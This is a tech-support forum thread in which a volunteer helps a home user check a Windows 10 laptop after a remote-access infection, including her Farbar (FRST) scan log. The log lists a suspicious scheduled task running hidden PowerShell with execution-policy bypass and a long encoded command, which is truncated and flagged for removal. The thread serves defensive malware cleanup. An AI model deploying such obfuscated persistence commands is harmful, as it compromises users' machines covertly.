Tech Support Guy banner
  • IMPORTANT: Only authorized members may reply to threads in this forum due to the complexity of the malware removal process. Authorized members include Malware Specialists and Trainees, Administrators, Moderators, and Trusted Advisors. Regular members are not permitted to reply, and any such posts will be deleted without notice or further explanation. Notice
Status
Not open for further replies.

Downloaded Bookworm. Someone has taken over my computer

Solved 
15K views 71 replies 3 participants last post by  capnkrunch 
#1 ·
Thank you for any help that you can offer.

This is from the Sysinfo Utility:

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 10 Home, 64 bit
Processor: Intel(R) Celeron(R) CPU N2830 @ 2.16GHz, Intel64 Family 6 Model 55 Stepping 8
Processor Count: 2
RAM: 1933 Mb
Graphics Card: Intel(R) HD Graphics, 1030 Mb
Hard Drives: C: Total - 466490 MB, Free - 431894 MB;
Motherboard: TOSHIBA, ZBWAA
Antivirus: Windows Defender, Disabled

I downloaded Bookworm Deluxe. Big mistake. When I turn on my Toshiba laptop, I get a black screen with the names Teamviewer, Supremo, Logmein, and Ammyy on the top.

On the side is Cmd, Task Manager, Explorer. Then there is a blue sign telling me to enter a product key, which I do not do.

The blue circle on the cursor keeps spinning. I get into my computer by pressing ctrl, alt, delete and clicking on Task Manager. Under startup, I click on Google Chrome and click on file location. Application Tools opens up. I right click open and get "their" replacement window entitled "searching." That window took over my google voice.

I clicked on Yahoo in my google toolbar and my google phone icon worked. Then I clicked on google in the toolbar and got my old google window.

I am afraid to go over to downloads to tell you what steps I have taken already, because when I click on anything if I am in the middle of something, then everything disappears.

I know I had McAfee antivirus which i disabled to use Windows Defender. I used RKill and rogue killer. I used malware bytes. I used a rootkits type cleaner. I cannot remember if I used Junkware cleaner or not.

That's all that I can remember. So sorry if this is too long. Wanted to give you as much information as possible.

Thank you once again.
 
See less See more
#2 · (Edited by Moderator)
I Think I fixed it, but not sure.

I kept at it, and finally figured it out. I am not good with computers. I am an old lady that just pretty much does email, facebook, and games.

However, I was up for the challenge. I read, searched, made mistakes, but kept on going.

I read the word "ransomeware" and looked it up. Took it from there. Got my screen and my taskbar back with all the icons. Also, Their signs and letter disappeared. However, I still had their homepage, with all these numbers after it.

My favorite tool is (I don't know if it's by Revo or Enigma) the one that scans for bits of downloads left behind by uninstallers.

In any case, if one of you would like to check a log or something to see if I am as secure as I think I am, I surely would appreciate it.

Thank you.
 
#4 · (Edited)
1. Download this
http://download.cnet.com/Malwarebytes-Anti-Malware-Free/3000-8022_4-10804572.html

Make sure you do not select the premium demo. You need the free version.

Install it and SCAN.

This can take a while, as it is very thorough.

Open the task manager (right click the taskbar and select task manager)

Click the startup tab.
See if there is anything there, which would make you suspicious. If in doubt, make a clip and post it here for our examination.

P.S. Ref your last post. What is making you suspicious?
P.P.S. You are in the virus section in the forums, of course. There are some guys who specialise in such, so if any problems continue, I am certain someone will step in with expert help.
 
#5 ·
Thank you for getting back to me, Dave. I did as you suggested, and ran Malwarebytes. I used this program a few times during my computer crisis. When I used it before, there were over 100 threats listed. I am sooo happy. There are no threats.

Now that I have calmed down and am trusting my computer again, I cannot even remember what was making me suspicious. My computer is working like it's new!

I have also run my McAfee antivirus a couple times. During the crisis, there was a virus that started with an A. Ar....it had 4 syllables. Can't remember the name of it. Well, my antivirus is reporting everything as ok.

I don't know why no one picked up my case. However, maybe that was for the best, because I have such a great feeling of accomplishment having solved this myself. I never thought I could do it.

Thank you so much for communicating with me, Dave. I really appreciate it.

Jackie
 
#7 ·
Hi. I feel that I still would like to have my system checked "just in case" there are any remnants of the malware, spyware that were in my computer. On the recommendation of Dave, I did run the free Malwarebytes, and there were zero problems.

May I please have a Malware Removal Specialist or Trainee to post instructions in this thread that I can carry out.

Thank you.
 
#8 · (Edited)
Warning!
The steps presented in these posts are for this person and machine ONLY. Do not apply these steps to your own system, without the guidance of a trained malware removal helper. Doing so, may possibly damage your system, preventing it from starting.
Hello jj832 :)

My name is capnkrunch and I will be helping you with your malware problems.

Before we begin, please read and follow these important guidelines, so things will proceed smoothly.
  • The instructions being given are for YOUR computer and system only!
    Using these instructions on a different computer can cause damage to that computer and possibly render it inoperable!
  • You must have Administrator rights, permissions for this computer.
  • DO NOT run any other fix or removal tools unless instructed to do so.
  • DO NOT install any other software (or hardware) during the cleaning process.
  • Only post your problem at (1) one help site. Applying fixes from multiple help sites can cause problems.
  • Print each set of instructions, if possible. Your Internet connection will not be available during some fix processes.
  • Only reply to this thread, do not start another ... Please, continue responding, until I give you the "All Clean".
    Remember, absence of symptoms does mean the infection is all gone.
  • Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.

Note: If you haven't done so already, please read this topic Everyone MUST read this BEFORE posting for help in this forum where the conditions for receiving help here are explained.

Please be aware that removing Malware is a potentially hazardous undertaking. I will take care, not to knowingly suggest courses of action that might damage your computer. However it is impossible for me to foresee all interactions that may happen between the software on your computer and those we'll use to clear you of infection and I cannot guarantee the safety of your system. It is possible that we might encounter situations where the only recourse is to re-format and re-install your operating system, or to necessitate you taking your computer to a repair shop.
For your safety and protection, I would advise backing up all your important documents, personal data files and photos to a CD or DVD drive as some infections may render your computer unbootable during or before the disinfection process. The safest practice is not to backup any files with the following file extensions:
exe, .scr, .ini, .htm, .html, .php, .asp, .xml, .zip, .rar, .cab as they may be infected.

 
#9 ·
Please run the following scans:

Step one...

FRST Scan
  • Please download FRST by Farbar, and save it to your Desktop.
    If you are not sure if your system is 32 or 64 bit download and run both. Only the correct one will run.
  • Close all open programs and windows so you are at your Desktop.
  • Right click FRST.exe/FRST64.exe and select Run as administrator.
  • When the tool opens click Yes to the disclaimer.
  • Press the Scan button and wait while the scan finished
  • Once finished, two files will open: FRST.txt and Addition.txt. Please copy and paste the contents of both logs in your reply.
    The logs can also be found in the same directory where FRST was run from.

Step two...

AdwCleaner - Scan Only
  • Please download AdwCleaner by Xplode save it to your Desktop.
  • Close all open programs and windows so that you are at your Desktop.
  • Right click on adwcleaner.exe and click Run as administrator.
  • Click on the Scan button.
    When the scan finishes, you'll see a message in the AdwCleaner window: "Waiting for action. Please uncheck elements you want to keep."
  • Do not attempt to clean anything at this point.
  • Click on the Logfile button.
  • This will open a file, AdwCleaner[S1].txt. Copy and paste the contents of that logfile in your reply.

Step three...

I'd like to see the Malwarebytes logs from before when it was finding many entries.

Post Malwarebytes Anti-Malware (MBAM) Logs
  • Press the Windows Key + R.
  • Type mbam.exe into the text box and click OK.
  • Click History.
  • Click a Scan Log.
  • If there were any detections in that log click Export and then click Copy to Clipboard. Paste the results in your next reply.
  • Repeat for all the scan logs.

Please post each log separately to prevent it being cut off by the forum post size limiter.
Check each after you've posted it to make sure it's all present, if any log is cut off you'll have to post it in sections...

In your next reply please include:
  • Did you have any problems with the instructions?
  • FRST.txt
  • Addition.txt
  • AdwCleaner[S1].txt
  • The MBAM logs
  • Are there any changes in computer behavior?
 
#10 ·
capnkrunch, Thank you very much for taking on my case.

During this scan, towards the beginning of the scan, my McAfee antivirus quarantined a trojan called "Artemis."

Here are the logs from Farbar Recovery Scan.

Additional scan result of Farbar Recovery Scan Tool (x64) Version:29-05-2016 02
Ran by Jackie (2016-05-31 02:56:25)
Running from C:\Users\Jackie\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-23 20:28:26)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3380728539-3698184502-3448567052-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3380728539-3698184502-3448567052-503 - Limited - Disabled)
Guest (S-1-5-21-3380728539-3698184502-3448567052-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3380728539-3698184502-3448567052-1005 - Limited - Enabled)
Jackie (S-1-5-21-3380728539-3698184502-3448567052-1001 - Administrator - Enabled) => C:\Users\Jackie

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adblock Plus for IE (32-bit and 64-bit) (HKLM\...\{0F347A49-E36C-4639-8D2E-003AD408B8B2}) (Version: 1.5 - Eyeo GmbH)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.242 - Adobe Systems Incorporated)
Adobe Flash Player 21 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 21.0.0.242 - Adobe Systems Incorporated)
Amazon 1Button App (HKLM-x32\...\{893CB813-4179-4BFE-8D33-ABCC38816B48}) (Version: 1.0.6 - Amazon) <==== ATTENTION
Amazon Kindle (HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\...\Amazon Kindle) (Version: 1.14.1.43029 - Amazon)
Apple Application Support (32-bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Atheros)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 51.0.2704.63 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.30.3 - Google Inc.) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Technology Access (HKLM-x32\...\{1709a432-4aab-4ad0-870d-ff74abc41bdd}) (Version: 1.9.0.1021 - Intel Corporation)
Intel(R) Technology Access Software Asset Manager (x32 Version: 3.1.814 - Intel Corporation) Hidden
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Mahjong Champ (HKLM-x32\...\MahjongChamp) (Version: - )
Mahjong Duels version 1.0 (HKLM-x32\...\Mahjong Duels_is1) (Version: 1.0 - )
Mahjongg Dimensions (HKLM-x32\...\Mahjongg Dimensions_is1) (Version: 1.0 - GameTop Pte. Ltd.)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
McAfee Total Protection (HKLM-x32\...\MSC) (Version: 14.0.9029 - McAfee, Inc.)
McAfee Virtual Technician (HKLM-x32\...\McAfee Virtual Technician) (Version: 8.1.0.135 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.189 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{d07b0db5-8dad-40e1-be90-88026298a46b}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{2749c485-3a8b-4533-92ff-7cf6e8221cff}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Paltalk Messenger 11.7 (HKLM-x32\...\Paltalk Messenger) (Version: 11.7.630.17743 - AVM Software Inc.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.318 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29075 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7592 - Realtek Semiconductor Corp.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.16.3 - Synaptics Incorporated)
TOSHIBA Application Installer (HKLM\...\{21A63CA3-75C0-4E56-B602-B7CD2EF6B621}) (Version: 9.0.2.6 - Toshiba Corporation)
TOSHIBA Audio Enhancement (HKLM\...\{1515F5E3-29EA-4CD1-A981-032D88880F09}) (Version: 2.0.18.0 - Toshiba Corporation)
TOSHIBA Display Utility (HKLM\...\{0B39C39A-3ECE-4582-9C91-842D22819A24}) (Version: 2.0.1.0 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{72EFCFA8-3923-451D-AF52-7CE9D87BC2A1}) (Version: 3.0.0.6406 - Toshiba Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.51.81.2C - TOSHIBA CORPORATION)
TOSHIBA Function Key (HKLM\...\{1844CFE2-EBA3-490A-8A5E-9BFC646342FD}) (Version: 1.1.5.6402 - Toshiba Corporation)
TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{59358FD4-252B-4B38-AB81-955C491A494F}) (Version: 2.0.0.15C - Toshiba Corporation)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 3.2.00.56006005 - Toshiba Corporation)
TOSHIBA Service Station (HKLM\...\{B1F241E1-90BF-4201-8977-A0DF85A38EBB}) (Version: 2.6.16.0 - Toshiba Corporation)
TOSHIBA Start (HKLM-x32\...\{4F0F44AF-90E9-4A6E-9E82-354A3AB79F22}) (Version: 1.0.0.2 - TOSHIBA America Information Systems, Inc)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0033 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{4D57ED72-6B01-40BD-9CA9-012B8FC09CEB}) (Version: 2.0.1.32003 - Toshiba Corporation)
TOSHIBA User's Guide (HKLM-x32\...\{3384E1D9-3F18-4A98-8655-180FEF0DFC02}) (Version: 1.00.02 - TOSHIBA)
TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.1.6 - TOSHIBA)
Utility Common Driver (x32 Version: 1.0.53.3 - Compal) Hidden
WebOptimum (x32 Version: 1.0.0.0 - bscodecs.com) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Jackie\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {187C1AA6-48E0-4B16-B0D3-56C3A00E40F6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {22B4377C-42E5-4112-AC8A-F7B22A924A0B} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-09-15] (Synaptics Incorporated)
Task: {3B426901-AF6C-4607-9072-7CBF8A26C7D0} - System32\Tasks\IntelTA-Upgrade-56460984-97c2-4bc7-a632-d776cf817f5d => C:\Program Files (x86)\Intel Corporation\Intel(R) Technology Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-08-12] (Intel Corporation)
Task: {3BFD9A67-B2AD-4289-960B-AB2875B31222} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-05-26] (Adobe Systems Incorporated)
Task: {3EC508AD-0FB1-45E6-8DE5-527D309F1867} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {53D408ED-AA58-4272-95C2-3612D5B2C203} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-10-11] (Realtek Semiconductor)
Task: {5725227D-1E24-4C18-BF43-3D0BA67A4153} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-09-04] (Intel Corporation)
Task: {59BC949D-214B-4EF3-BC05-490F8C1FD653} - System32\Tasks\IntelTA-Upgrade-56460984-97c2-4bc7-a632-d776cf817f5d-Logon => C:\Program Files (x86)\Intel Corporation\Intel(R) Technology Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-08-12] (Intel Corporation)
Task: {5AD30429-A8BB-48D0-A652-B5F1A0184F56} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {5CD0A353-325B-47F1-BFEA-71C8E039C6D1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {5E60A084-FCB7-4D86-B311-2BFC5D8925CC} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5F9D86DF-7B3F-4DFA-A459-555B1E544D3F} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {643C1007-99CA-43E6-AC49-BE4DD5039783} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-03-13] (Google Inc.)
Task: {72EF661D-E58A-4BFD-A927-F307D592C6BF} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-01-27] (McAfee, Inc.)
Task: {888D0D85-3D0A-4496-951F-6B1397CA4547} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {903CE0CF-33B8-49F5-97F0-51DF41A9A8F3} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {92233A66-4718-4BB0-9E9B-A22ED543E163} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2014-04-03] (TOSHIBA Corporation)
Task: {922EEF01-C913-4DDB-B454-A4D17E7A9C46} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {96A2091E-0F33-4014-AD1C-6A3D0CBED525} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-01-27] (McAfee, Inc.)
Task: {9EE556F3-F1BB-413D-99E2-14E64688B760} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {A896987E-ECA7-4D5E-B831-92CDAE1C95AE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-03-13] (Google Inc.)
Task: {B0D7805C-1350-4A42-8B65-523AC05DC24F} - \patch1 -> No File <==== ATTENTION
Task: {B2D54339-7576-4F0D-911F-C5A5EEE43ECA} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {B8D3CC44-B5CE-4680-A725-E90F7A14313A} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2016-04-23] (McAfee, Inc.)
Task: {BC5947D0-3463-4518-9313-3C81EBB84D93} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {C2D1E685-FA86-45AA-8DC0-775BF3C754CE} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {D62137B2-024B-4967-AAD3-6175DA73F447} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {D9BE2E2B-C60E-47D8-A063-89C6C440B3A1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {DCC73307-96BA-4EC8-AD96-5428236AD484} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DE083D62-37C0-4DF4-896B-B8481B01E22D} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_242_pepper.exe [2016-05-25] (Adobe Systems Incorporated)
Task: {DF45108E-9337-44F7-8829-CC6AA2888D4B} - System32\Tasks\{0A0A0A47-0E0D-780B-0A11-0E7E7909110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAOwAgADsAOwA7ADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUA (the data entry has 10060 more characters). <==== ATTENTION
Task: {F0700E63-3390-463F-9522-67B9E86E50B2} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {FF48B1A1-8229-41A1-93C5-8A6B7F36E3BA} - System32\Tasks\TechAgent Task => C:\PROGRA~2\TECHAG~1\TECHMO~1.EXE

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_242_pepper.exe
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-10-30 03:17 - 2015-10-30 03:17 - 00028672 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-07-07 11:44 - 2015-07-07 11:44 - 00088064 _____ () C:\Program Files\Intel Corporation\Intel(R) Technology Access\libglog.dll
2016-03-15 14:42 - 2016-03-15 14:42 - 00368800 _____ () C:\Program Files\Intel Corporation\Intel(R) Technology Access\JsonCpp.dll
2015-10-30 03:18 - 2015-10-30 03:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-04-12 17:44 - 2016-03-29 06:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-12 17:44 - 2016-03-29 06:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-05-18 01:02 - 2016-05-18 01:02 - 00959168 _____ () C:\Users\Jackie\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2015-12-24 15:56 - 2015-12-07 00:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-05-10 16:49 - 2016-04-23 00:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-05-10 16:50 - 2016-04-23 00:02 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-05-10 16:50 - 2016-04-22 23:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-05-10 16:51 - 2016-04-22 23:58 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-05-10 16:51 - 2016-04-23 00:01 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2012-07-18 21:38 - 2012-07-18 21:38 - 00020904 _____ () C:\Program Files\TOSHIBA\Hotkey\SmoothView.dll
2016-05-18 01:01 - 2016-05-18 01:01 - 00679624 _____ () C:\Users\Jackie\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2016-05-25 23:13 - 2016-05-25 03:38 - 01745560 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.63\libglesv2.dll
2016-05-25 23:13 - 2016-05-25 03:38 - 00091288 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.63\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
